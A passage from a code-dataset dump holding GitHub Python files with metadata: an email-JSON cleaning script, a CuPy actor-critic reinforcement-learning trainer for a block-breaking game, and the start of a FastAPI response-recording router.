"torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "20990295509", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 17 11:36:13 2020\r\n\r\n@author: Yadnesh\r\n\"\"\"\r\n\r\nimport json\r\nimport re \r\n\r\ndef cleanfile():\r\n with open('data.json',encoding='utf-8') as f:\r\n filedata = f.read()\r\n filedata = filedata.replace(\"'id'\", '\"id\"')\r\n filedata = filedata.replace(\"'threadId'\", '\"threadId\"')\r\n filedata = filedata.replace(\"'labelIds'\", '\"labelIds\"')\r\n filedata = filedata.replace(\"'payload'\", '\"payload\"')\r\n filedata = filedata.replace(\"'partId'\", '\"partId\"')\r\n filedata = filedata.replace(\"'headers'\", '\"headers\"')\r\n filedata = filedata.replace(\"'name'\", '\"name\"')\r\n filedata = filedata.replace(\"'value'\", '\"value\"')\r\n filedata = filedata.replace(\"'sizeEstimate'\", '\"sizeEstimate\"')\r\n filedata = filedata.replace(\"'historyId'\", '\"historyId\"')\r\n filedata = filedata.replace(\"'internalDate'\", '\"internalDate\"')\r\n filedata = filedata.replace(\"NONE\", \"\")\r\n filedata = filedata.replace(\"none\", \"\")\r\n print(filedata)\r\n f=eval(filedata)\r\n \r\n return f\r\n\r\ndef check(email): \r\n # Make a regular expression \r\n # for validating an Email \r\n regex = '^[a-z0-9]+[\\._]?[a-z0-9]+[@]\\w+[.]\\w{2,3}$'\r\n # pass the regular 
expression \r\n # and the string in search() method \r\n if(re.search(regex,email)): \r\n print(\"Valid Email\") \r\n return 1\r\n else: \r\n print(\"Invalid Email\") \r\n\r\ndef ProcessData(f):\r\n list1= list(f['messages'])\r\n list_final=[]\r\n for elements in list1:\r\n sep_dict = dict(elements)\r\n \r\n dictionary = { \r\n \"id\": '',\r\n \"history_id\":'' ,\r\n \"thread_id\" : '',\r\n \"labels\": [],\r\n \"from\": \"\",\r\n \"from_name\": \"\",\r\n \"subject\": \"\",\r\n \"date\": \"\",\r\n \"to\": {}\r\n }\r\n\r\n dictionary['id']=sep_dict['id']\r\n dictionary['history_id']=sep_dict['historyId']\r\n dictionary['thread_id']=sep_dict['threadId']\r\n dictionary['labels']=sep_dict['labelIds']\r\n\r\n InnerList=list(sep_dict['payload']['headers'])\r\n\r\n print(len(InnerList))\r\n\r\n for i in InnerList:\r\n fromstring=str(i['name'])\r\n x=[]\r\n if(fromstring)==str('From'):\r\n #print(i['value'])\r\n try:\r\n x = str(i['value']).split(\"<\", 2)\r\n x[1].replace('>', '')\r\n #print(x[0])\r\n #print(x[1])\r\n #dictionary['from']=i['value']\r\n dictionary['from']=str(x[0])\r\n dictionary['from_name']=str(x[1])\r\n except:\r\n print(\"\")\r\n if(fromstring)==str('Subject'):\r\n dictionary['subject']=str(i['value'])\r\n #print(str(i['value']))\r\n if(fromstring)==str('Date'):\r\n dictionary['date']=str(i['value'])\r\n #print(str(i['value']))\r\n if(fromstring)==str('To'):\r\n try:\r\n y = str(i['value']).split(\",\")\r\n except:\r\n y = str(i['value'])\r\n print(y)\r\n final_inner_list=[]\r\n for details in y:\r\n InnerDict={\r\n \"name\":\"\",\r\n \"email\":\"\"\r\n }\r\n #print(details)\r\n \r\n try:\r\n x1= str(details).split(\"<\", 2)\r\n str(x1[1]).replace('>', '')\r\n \r\n InnerDict[\"name\"] = str(x1[0])\r\n InnerDict[\"email\"] = str(x1[1])\r\n final_inner_list.append(InnerDict)\r\n except:\r\n c=check(x1[0])\r\n if(c==1):\r\n InnerDict[\"name\"] = \"\"\r\n InnerDict[\"email\"] = str(x1[0])\r\n final_inner_list.append(InnerDict)\r\n elif not str(x1[0]):\r\n InnerDict[\"name\"] = str(x1[0])\r\n InnerDict[\"email\"] = \"\" \r\n final_inner_list.append(InnerDict)\r\n print(\"single Entry\")\r\n \r\n dictionary['to']=final_inner_list\r\n\r\n list_final.append(dictionary)\r\n return list_final\r\n\r\n# Defining main function \r\ndef main(): \r\n filedata = cleanfile()\r\n finallist =ProcessData(filedata)\r\n #data=dict(finallist)\r\n \r\n with open('Processdata.json', 'w', encoding='utf-8') as f:\r\n json.dump(finallist, f,indent=4)\r\n \r\n \r\n# Using the special variable \r\n# __name__ \r\nif __name__==\"__main__\": \r\n main() \r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "YadsmiC/Python-Data-cleaning-Json", "sub_path": "Clean Json Python Code.py", "file_name": "Clean Json Python Code.py", "file_ext": "py", "file_size_in_byte": 4859, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "re.search", "line_number": 38, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "70931031324", "text": "import cupy as np\n#import tkinter as tk\nimport time\nimport math\nimport random\nimport copy\nfrom collections import OrderedDict\n\n\nfrom neural_net import neuralnet_function as nnf\nfrom neural_net import neuralnet_class as nnc\nfrom environment import block_env as benv\n\n\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# numpy dtype precision\naccuracy = np.float64\n\n\nGAMMA=0.995\nNUM_EPISODES=100000\n\nNUM_PROCESSES=32\n
NUM_ADVANCED_STEP = 5\n\nlearning_rate = 0.00001/10\n\n\nclass Adam:\n def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):\n self.lr = lr\n self.beta1 = beta1\n self.beta2 = beta2\n self.iter = 0\n self.m = None\n self.v = None\n\n def update(self, params, grads):\n if self.m is None:\n self.m, self.v = {}, {}\n for key, val in params.items():\n self.m[key] = np.zeros_like(val,accuracy)\n self.v[key] = np.zeros_like(val,accuracy)\n\n self.iter += 1\n lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)\n for key in params.keys():\n self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])\n self.v[key] += (1 - self.beta2) * (grads[key]**2 - self.v[key])\n params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)\n\n\nclass RolloutStorage(object):\n def __init__(self, num_steps, num_processes, obs_shape):\n # basic information\n self.observations = np.zeros((num_steps+1,num_processes,*obs_shape),accuracy)\n self.masks = np.ones((num_steps+1,num_processes, 1),accuracy)\n self.rewards = np.zeros((num_steps,num_processes, 1),accuracy)\n self.actions = np.zeros((num_steps,num_processes, 1),accuracy)\n\n self.returns = np.zeros((num_steps+1,num_processes, 1),accuracy)\n self.dout = np.zeros((num_steps+1,num_processes, 1),accuracy)\n self.index = 0\n\n def save(self, obs, action, reward, mask):\n self.observations[self.index + 1] = copy.copy(obs)\n self.masks[self.index + 1] = copy.copy(mask)\n self.rewards[self.index] = copy.copy(reward)\n self.actions[self.index] = copy.copy(action)\n\n self.index = (self.index + 1)%NUM_ADVANCED_STEP\n\n def after_update(self):\n self.observations[0] = copy.copy(self.observations[-1])\n\n def compute_returns(self, next_value):\n # next_value has shape (num_processes, 1)\n self.returns[-1] = next_value\n for ad_step in reversed(range(self.rewards.shape[0])):\n self.returns[ad_step] = self.rewards[ad_step]+GAMMA*self.masks[ad_step + 1]*self.returns[ad_step + 1]\n\n def compute_dout(self):\n self.dout[-1] = 1\n for ad_step in reversed(range(self.rewards.shape[0])):\n self.dout[ad_step] = GAMMA*self.masks[ad_step + 1]*self.dout[ad_step + 1]\n\n\n\n\n\nclass Net():\n def __init__(self,params):\n weight_init_std=0.01\n self.params={}\n self.params['CW1']=params[\"arr_0\"]#weight_init_std*np.random.randn(32,2,8,8)\n self.params['Cb1']=params[\"arr_1\"]#np.ones(32)\n self.params['CW2']=params[\"arr_2\"]#weight_init_std*np.random.randn(64,32,4,4)\n self.params['Cb2']=params[\"arr_3\"]#np.ones(64)\n self.params['CW3']=params[\"arr_4\"]#weight_init_std*np.random.randn(64,64,3,3)\n self.params['Cb3']=params[\"arr_5\"]#np.ones(64)\n\n self.params['W1']=params[\"arr_6\"]#weight_init_std*np.random.randn(5184,512)/np.sqrt(5184/2)\n self.params['b1']=params[\"arr_7\"]#np.zeros(512)\n\n self.params['W_critic']=params[\"arr_8\"]#weight_init_std*np.random.randn(512,1)/np.sqrt(512/2)\n self.params['b_critic']=params[\"arr_9\"]#np.zeros(1)\n\n self.params['W_actor']=params[\"arr_10\"]#weight_init_std*np.random.randn(512,3)/np.sqrt(512/2)\n self.params['b_actor']=params[\"arr_11\"]#np.zeros(3)\n\n self.layers=OrderedDict()\n self.layers[\"Convolution1\"]=nnc.Convolution(self.params['CW1'],self.params['Cb1'],stride=4)\n self.layers['Relu1']=nnc.Relu()\n self.layers[\"Convolution2\"]=nnc.Convolution(self.params['CW2'],self.params['Cb2'],stride=2)\n self.layers['Relu2']=nnc.Relu()\n self.layers[\"Convolution3\"]=nnc.Convolution(self.params['CW3'],self.params['Cb3'],stride=1)\n self.layers['Relu3']=nnc.Relu()\n self.layers[\"Connect\"]=nnc.Connection()\n\n
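 # dense trunk shared by the actor and critic output heads\n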
 self.layers['Affine1']=nnc.Affine(self.params['W1'],self.params['b1'])\n\n self.layer_Affine_critic = nnc.Affine(self.params['W_critic'],self.params['b_critic'])\n self.layer_Affine_actor = nnc.Affine(self.params['W_actor'],self.params['b_actor'])\n\n\n\n\n def forward(self, x):\n for layer in self.layers.values():\n x = layer.forward(x)\n\n critic_output = self.layer_Affine_critic.forward(x)\n actor_output = self.layer_Affine_actor.forward(x)\n\n return critic_output, actor_output\n\n def gradient(self, dout_critic, dout_actor):\n\n dout_critic = self.layer_Affine_critic.backward(dout_critic)\n dout_actor = self.layer_Affine_actor.backward(dout_actor)\n dout = dout_actor + dout_critic\n layers=list(self.layers.values())\n layers.reverse()\n for layer in layers:\n dout=layer.backward(dout)\n self.grads={}\n self.grads['CW1']=self.layers['Convolution1'].dW\n self.grads['Cb1']=self.layers['Convolution1'].db\n self.grads['CW2']=self.layers['Convolution2'].dW\n self.grads['Cb2']=self.layers['Convolution2'].db\n self.grads['CW3']=self.layers['Convolution3'].dW\n self.grads['Cb3']=self.layers['Convolution3'].db\n\n self.grads['W1']=self.layers['Affine1'].dW\n self.grads['b1']=self.layers['Affine1'].db\n\n self.grads['W_critic']=self.layer_Affine_critic.dW\n self.grads['b_critic']=self.layer_Affine_critic.db\n\n self.grads['W_actor']=self.layer_Affine_actor.dW\n self.grads['b_actor']=self.layer_Affine_actor.db\n\n\n def get_action(self, x):\n #x=array(num_processes,*obs_shape)\n _, actor_output = self.forward(x)\n # output shape is (num_processes, 3)\n # actor_output.size() is torch.Size([1, 3]); action and value are (1, 1), torch.Size([1, 1])\n prob = nnf.softmax(actor_output)\n #print(prob)\n action =np.array([ np.random.choice(a=[0,1,2],size= 1, p = prob[i]) for i in range(x.shape[0])],accuracy)\n # action is returned with shape (NUM_PROCESSES, 1)\n return action.reshape(-1,1)\n\n\n def get_value(self,x):\n value, _ = self.forward(x)\n return value.reshape(-1,1)\n\n\n def evaluate_actions(self, x, actions):\n value, actor_output = self.forward(x)\n\n probs = nnf.softmax(actor_output) # (step*num_processes,3)\n #print(\"test1\")\n #print(probs)\n action_probs = np.array( [probs[i][int(actions[i])] for i in range(actions.shape[0])] ,accuracy).reshape(-1,1) # (~,1)\n #print(\"test2\")\n #print(action_probs)\n action_log_probs= np.log(action_probs+1e-7)# (~,1)\n self.probs = probs\n #print(\"test3\")\n entropy = -np.sum(np.log(probs+1e-7)*probs)/probs.shape[0]\n #print(\"test4\")\n return value, action_log_probs, entropy\n\n\n\nclass Brain(object):\n def __init__(self, actor_critic):\n self.actor_critic = actor_critic\n self.optimizer = Adam(lr = learning_rate)\n\n def update(self, rollouts):\n obs_shape = rollouts.observations.shape[2:]\n num_steps = NUM_ADVANCED_STEP\n num_processes = NUM_PROCESSES\n\n values, action_log_probs, entropy = self.actor_critic.evaluate_actions(\n rollouts.observations[:-1].reshape(-1,2,100,100),\n rollouts.actions.reshape(-1,1) #(num_step*num_processes,1)\n )\n\n\n\n values = values.reshape(num_steps,num_processes, 1)\n action_log_probs = action_log_probs.reshape(num_steps,num_processes, 1)\n advantages = rollouts.returns[:-1]-values\n value_loss = np.mean(advantages**2)\n action_gain = np.mean(action_log_probs*advantages)\n total_loss = 0.5*value_loss-action_gain-0.01*entropy\n\n # compute the backward pass\n probs = self.actor_critic.probs #(step*process,3)\n\n tmp = np.zeros_like(probs,accuracy)\n act = rollouts.actions.reshape(-1,1)\n for i in range(num_steps*num_processes):\n
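 # scatter each step's advantage into the slot of the action actually taken\n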
 tmp[i][int(act[i])]=(rollouts.returns[:-1].reshape(-1,1)-values.reshape(-1,1))[i][0]/(num_processes*num_steps)\n\n # compute dout_J\n dout_J = tmp*probs-(np.sum(tmp*probs,axis = -1).reshape(-1,1))*probs\n # compute dout_entropy\n entropy_sec = np.sum(probs*np.log(probs), axis =1).reshape(-1,1)\n dout_entropy = (probs*np.log(probs)-probs*entropy_sec)/(num_steps*num_processes)\n # compute dout_actor\n dout_actor = -0.01*dout_entropy-dout_J\n\n\n rollouts.compute_dout()\n dout_value_loss = 2*advantages*(rollouts.dout[:-1]-1)/(num_steps*num_processes)\n dout_action_gain = action_log_probs*(rollouts.dout[:-1]-1)/(num_steps*num_processes)\n dout_critic = 0.5*dout_value_loss-dout_action_gain\n\n self.actor_critic.gradient(dout_critic = dout_critic.reshape(num_steps*num_processes,1),\n dout_actor = dout_actor.reshape(num_steps*num_processes,3))\n params = self.actor_critic.params\n grads = self.actor_critic.grads\n self.optimizer.update(params, grads)\n\n\n\nclass Environment:\n def __init__(self,save_flag = False, path = \"./trained_params.npz\"):\n self.save_flag = save_flag\n print(\"============ Load parameters ============\")\n self.params = np.load(path)\n self.actor_critic = Net(self.params)\n def run(self):\n envs = [benv.Env() for i in range(NUM_PROCESSES)]\n n_in= (2,100,100)\n n_plot_in = (1,100,100)\n brain = Brain(self.actor_critic)\n\n # state array sizes\n obs_np = np.zeros([NUM_PROCESSES,*n_in],accuracy)\n obs_plot_np = np.zeros([NUM_PROCESSES,*n_plot_in],accuracy)\n\n # lists of basic information\n current_obs = np.zeros((NUM_PROCESSES,*n_in),accuracy)\n rollouts = RolloutStorage(NUM_ADVANCED_STEP,NUM_PROCESSES,n_in)\n episode_rewards = np.zeros([NUM_PROCESSES,1],accuracy)\n final_rewards = np.zeros([NUM_PROCESSES,1],accuracy)\n\n\n reward_np = np.zeros([NUM_PROCESSES,1],accuracy)\n done_np = np.zeros([NUM_PROCESSES,1],accuracy)\n each_step = [ 0 for _ in range(NUM_PROCESSES)]\n\n # initialize the states\n obs = [env.reset() for env in envs]\n obs = np.array(obs,accuracy)\n current_obs = obs #(NUM_PROCESSES, 2, 100, 100)\n\n noop = np.random.randint(0,30,(NUM_PROCESSES,1)).astype(accuracy)\n\n elapsed_episode = [ 0 for _ in range(NUM_PROCESSES)]\n life_max = 1\n life = [ life_max for _ in range(NUM_PROCESSES)]\n\n total_deleted_blocks = [ 0 for i in range(NUM_PROCESSES)]\n\n # these variables are for the call-back.\n tmp_num_blocks = [ envs[i].block_num for i in range(NUM_PROCESSES)]\n tmp_inverse_loss = 0\n tmp_inverse_loss_index = 0\n\n for j in range(NUM_EPISODES):\n for step in range(NUM_ADVANCED_STEP):\n # uncomment to see progress when there are many parallel environments.\n #print((j,step))\n # get actions\n #with torch.no_grad():\n actions = self.actor_critic.get_action(rollouts.observations[step]) # vector of shape (NUM_PROCESSES,1)\n # set no-operation steps\n for i in range(NUM_PROCESSES):\n if each_step[i]<=noop[i]:\n actions[i] = np.array([1],accuracy)\n # execute a step in the main process\n #print(envs[i].step(2*(actions.tolist()[i][0]-1)/envs[i].scale)[0].shape)\n #print(obs_np[i].shape)\n obs_np[i], done_np[i],_= envs[i].step(2*(actions.tolist()[i][0]-1)/envs[i].scale)\n\n\n\n # if the ball has reached the ground\n if done_np[i]:\n total_deleted_blocks[i] += tmp_num_blocks[i]-len(envs[i].lst)\n life[i] -= 1\n if i == 0:\n print(f'episode : {elapsed_episode[i]:04} | current step : {int(each_step[i]):04} | life : {life[i]+1} | deleted blocks : {envs[i].block_num-len(envs[i].lst):02} |',\\\n f' all env\\'s average deleted blocks : {int(sum([10*total_deleted_blocks[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10}')\n print([int(10*total_deleted_blocks[i]/(elapsed_episode[i]+1))/10 for i in range(NUM_PROCESSES)])\n
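 # the list above shows the per-environment running averages of deleted blocks\n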
print(\"===================================================================================================================\")\n if elapsed_episode[i]%10 == 0 and elapsed_episode[i] != 0:\n print(\"+++++++++++ save parameters +++++++++++++\")\n np.savez(\"./trained_params\",\n env.actor_critic.params[\"CW1\"].astype(accuracy),\n env.actor_critic.params[\"Cb1\"].astype(accuracy),\n env.actor_critic.params[\"CW2\"].astype(accuracy),\n env.actor_critic.params[\"Cb2\"].astype(accuracy),\n env.actor_critic.params[\"CW3\"].astype(accuracy),\n env.actor_critic.params[\"Cb3\"].astype(accuracy),\n env.actor_critic.params[\"W1\"].astype(accuracy),\n env.actor_critic.params[\"b1\"].astype(accuracy),\n env.actor_critic.params[\"W_critic\"].astype(accuracy),\n env.actor_critic.params[\"b_critic\"].astype(accuracy),\n env.actor_critic.params[\"W_actor\"].astype(accuracy),\n env.actor_critic.params[\"b_actor\"].astype(accuracy))\n\n if tmp_num_blocks[i] == 0:\n reward_np[i] = 0\n else:\n reward_np[i] = np.array([(tmp_num_blocks[i]-len(envs[i].lst))/tmp_num_blocks[i] ],accuracy)\n\n each_step[i] = 0\n if life[i] >= 1:\n tmp_num_blocks[i] = len(envs[i].lst)\n obs_np[i] = envs[i].reset_tmp(envs[i].lst,envs[i].tmp)\n else:\n tmp_num_blocks[i] = envs[i].block_num\n life[i]=life_max\n obs_np[i] = envs[i].reset()\n noop[i] = random.randint(0,30)\n elapsed_episode[i]+=1\n\n #問題なくステップが進んだ場合\n else:\n if envs[i].mouse_x < 10 or 90 < envs[i].mouse_x:\n if envs[i].ref_n==0:\n reward_np[i] = -0.0005\n else:\n reward_np[i] = 1./NUM_PROCESSES\n else:\n if envs[i].ref_n==0:\n reward_np[i] = 0.\n else:\n reward_np[i] = 1./NUM_PROCESSES\n each_step[i] += 1\n\n #更新の準備\n reward = reward_np\n episode_rewards += reward\n\n masks = np.array([[0.] if done_ else [1.] for done_ in done_np],accuracy)\n final_rewards *= masks\n final_rewards += (1-masks)*episode_rewards\n episode_rewards *= masks\n\n obs = obs_np\n current_obs = obs\n #全てTensor\n rollouts.save(current_obs, actions, reward, masks)\n #Advanced-step終了後の更新\n #with torch.no_grad():\n next_value = self.actor_critic.get_value(rollouts.observations[-1])\n rollouts.compute_returns(next_value)\n brain.update(rollouts)\n rollouts.after_update() #更新\n\n \"\"\"\n #test######################################################################################################################################\n if tmp_inverse_loss <= int(sum([10*full_total_ref[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10:\n tmp_inverse_loss = int(sum([10*full_total_ref[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10\n tmp_inverse_loss_index = 0\n elif tmp_inverse_loss_index < 100:\n tmp_inverse_loss_index+=1\n else:\n tmp_inverse_loss_index = 0\n learning_rate/=2\n ###########################################################################################################################################\n \"\"\"\n if np.average(elapsed_episode) >= 200+1:\n print(\"Finish : \",int(sum([10*total_deleted_blocks[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10)\n break\n #test\n return int(sum([10*total_deleted_blocks[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10\n\n\n\n\n\n\nfull_results = []\nresults = []\ntmp_max=0\nwith open(\"./model_best.txt\",\"r\") as f:\n tmp_max = float(f.read())\n\nfor seq in range(100):\n path = \"./trained_params.npz\"\n print(\"number [\",seq, \"] loop started\")\n\n for loop in range(1000):\n flag = False\n print(\"Now is \",seq,\"-\",loop,\"time's loop : current 
best score is \",tmp_max)\n env=Environment(save_flag = flag, path = path)\n ave = env.run()\n results.append(ave)\n\n if tmp_max <= ave:\n print(\"maximum value of average is updated : \",ave)\n tmp_max = ave\n with open(\"./model_best.txt\",\"w\") as f:\n f.write(str(f'{tmp_max}'))\n\n else:\n print(\"maximum value of average is not updated : \",tmp_max)\n\n print(\"+++++++++++ save parameters +++++++++++++\")\n np.savez(\"./trained_params\",\n env.actor_critic.params[\"CW1\"].astype(accuracy),\n env.actor_critic.params[\"Cb1\"].astype(accuracy),\n env.actor_critic.params[\"CW2\"].astype(accuracy),\n env.actor_critic.params[\"Cb2\"].astype(accuracy),\n env.actor_critic.params[\"CW3\"].astype(accuracy),\n env.actor_critic.params[\"Cb3\"].astype(accuracy),\n env.actor_critic.params[\"W1\"].astype(accuracy),\n env.actor_critic.params[\"b1\"].astype(accuracy),\n env.actor_critic.params[\"W_critic\"].astype(accuracy),\n env.actor_critic.params[\"b_critic\"].astype(accuracy),\n env.actor_critic.params[\"W_actor\"].astype(accuracy),\n env.actor_critic.params[\"b_actor\"].astype(accuracy))\n\n path = \"./trained_params.npz\"\n del env\n full_results.append(sum(results)/len(results))\n", "repo_name": "asahi-kojima/DQL", "sub_path": "main_process_full_original_multi_envA2C_7.py", "file_name": "main_process_full_original_multi_envA2C_7.py", "file_ext": "py", "file_size_in_byte": 19490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cupy.float64", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cupy.zeros_like", "line_number": 46, "usage_type": "call"}, {"api_name": "cupy.zeros_like", "line_number": 47, "usage_type": "call"}, {"api_name": "cupy.sqrt", "line_number": 50, "usage_type": "call"}, {"api_name": "cupy.sqrt", "line_number": 54, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "cupy.ones", "line_number": 61, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 63, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 66, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 70, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 71, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 72, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 73, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 78, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 115, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class.Convolution", "line_number": 116, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 116, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Relu", "line_number": 117, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 117, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Convolution", "line_number": 118, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 118, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Relu", "line_number": 119, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 119, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Convolution", "line_number": 120, "usage_type": "call"}, {"api_name": 
"neural_net.neuralnet_class", "line_number": 120, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Relu", "line_number": 121, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 121, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Connection", "line_number": 122, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 122, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Affine", "line_number": 124, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 124, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Affine", "line_number": 126, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 126, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Affine", "line_number": 127, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 127, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_function.softmax", "line_number": 173, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_function", "line_number": 173, "usage_type": "name"}, {"api_name": "cupy.array", "line_number": 175, "usage_type": "call"}, {"api_name": "cupy.random.choice", "line_number": 175, "usage_type": "call"}, {"api_name": "cupy.random", "line_number": 175, "usage_type": "attribute"}, {"api_name": "neural_net.neuralnet_function.softmax", "line_number": 188, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_function", "line_number": 188, "usage_type": "name"}, {"api_name": "cupy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "cupy.log", "line_number": 194, "usage_type": "call"}, {"api_name": "cupy.sum", "line_number": 197, "usage_type": "call"}, {"api_name": "cupy.log", "line_number": 197, "usage_type": "call"}, {"api_name": "cupy.mean", "line_number": 223, "usage_type": "call"}, {"api_name": "cupy.mean", "line_number": 224, "usage_type": "call"}, {"api_name": "cupy.zeros_like", "line_number": 230, "usage_type": "call"}, {"api_name": "cupy.sum", "line_number": 236, "usage_type": "call"}, {"api_name": "cupy.sum", "line_number": 238, "usage_type": "call"}, {"api_name": "cupy.log", "line_number": 238, "usage_type": "call"}, {"api_name": "cupy.log", "line_number": 239, "usage_type": "call"}, {"api_name": "cupy.load", "line_number": 261, "usage_type": "call"}, {"api_name": "environment.block_env.Env", "line_number": 264, "usage_type": "call"}, {"api_name": "environment.block_env", "line_number": 264, "usage_type": "name"}, {"api_name": "cupy.zeros", "line_number": 270, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 271, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 274, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 276, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 277, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 280, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 281, "usage_type": "call"}, {"api_name": "cupy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "cupy.random.randint", "line_number": 289, "usage_type": "call"}, {"api_name": "cupy.random", "line_number": 289, "usage_type": "attribute"}, {"api_name": "cupy.array", "line_number": 312, "usage_type": "call"}, {"api_name": "cupy.savez", "line_number": 331, "usage_type": "call"}, {"api_name": "cupy.array", "line_number": 348, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 358, "usage_type": 
"call"}, {"api_name": "cupy.array", "line_number": 379, "usage_type": "call"}, {"api_name": "cupy.average", "line_number": 407, "usage_type": "call"}, {"api_name": "cupy.savez", "line_number": 445, "usage_type": "call"}]} +{"seq_id": "27137768650", "text": "from fastapi import APIRouter, HTTPException\n\nfrom ..database.load_companies_tweets import load_data\nfrom ..database.responses import load_respones, save_responses\nfrom ..internal.responses import RecordResponse\n\nrouter = APIRouter()\n\nfrom .round_robin import companies, tweet_pairs, correct_tweets, incorrect_tweets\n\n@router.post(\"/responses\")\nasync def record_response(response: RecordResponse):\n responses = response.response\n\n responses_db = load_respones()\n\n try:\n\n for resp in responses:\n company_id = resp[\"company_id\"]\n\n if not correct_tweets[company_id].get(resp[\"tweet_id\"], False) and not incorrect_tweets[company_id].get(resp[\"tweet_id\"], False):\n raise HTTPException(status_code=404, detail=\"Company with ID not found\")\n\n if correct_tweets[company_id].get(resp[\"tweet_id\"], False):\n tweet = dict(correct_tweets[company_id].get(resp[\"tweet_id\"], False))\n tweet[\"date\"] = 